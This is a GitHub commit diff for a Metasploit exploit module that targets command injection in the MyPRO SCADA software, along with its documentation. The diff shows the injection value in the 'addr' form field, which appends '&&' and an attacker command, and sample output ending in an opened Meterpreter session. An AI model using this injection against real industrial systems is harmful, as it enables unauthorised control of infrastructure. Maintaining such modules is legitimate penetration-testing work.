Skip to content

Commit 1494567

Browse files
committed
Updated email generation part.
1 parent d3c2177 commit 1494567

File tree

2 files changed

+2
-8
lines changed

2 files changed

+2
-8
lines changed

documentation/modules/exploit/windows/scada/mypro_cmdexe.md

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -63,7 +63,6 @@ msf6 exploit(windows/scada/mypro_cmdexe) > exploit
6363
[*] Checking credentials...
6464
[+] Credentials are working.
6565
[*] Sending command injection...
66-
[*] Using randomly generated email address: [email protected]
6766
[*] Sending stage (201798 bytes) to 192.168.1.239
6867
[*] Meterpreter session 12 opened (192.168.1.241:4444 -> 192.168.1.239:57382) at 2024-07-23 23:38:12 -0400
6968
[*] Exploit finished, check thy shell.

modules/exploits/windows/scada/mypro_cmdexe.rb

Lines changed: 2 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -37,7 +37,7 @@ def initialize(info = {})
3737
'Notes' => {
3838
'Stability' => [CRASH_SAFE],
3939
'Reliability' => [REPEATABLE_SESSION],
40-
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
40+
'SideEffects' => [IOC_IN_LOGS]
4141
}
4242
)
4343
)
@@ -130,14 +130,9 @@ def check_auth
130130

131131
# Send command injection
132132
def exec_mypro(cmd)
133-
# Generating a random email address
134-
addr = "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com"
135-
136-
print_status("Using randomly generated email address: #{addr}")
137-
138133
post_data = {
139134
'type' => 'sendEmail',
140-
'addr' => "addr\"&&#{cmd}"
135+
'addr' => "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com\"&&#{cmd}"
141136
}
142137
post_json = JSON.generate(post_data)
143138

0 commit comments

Comments
 (0)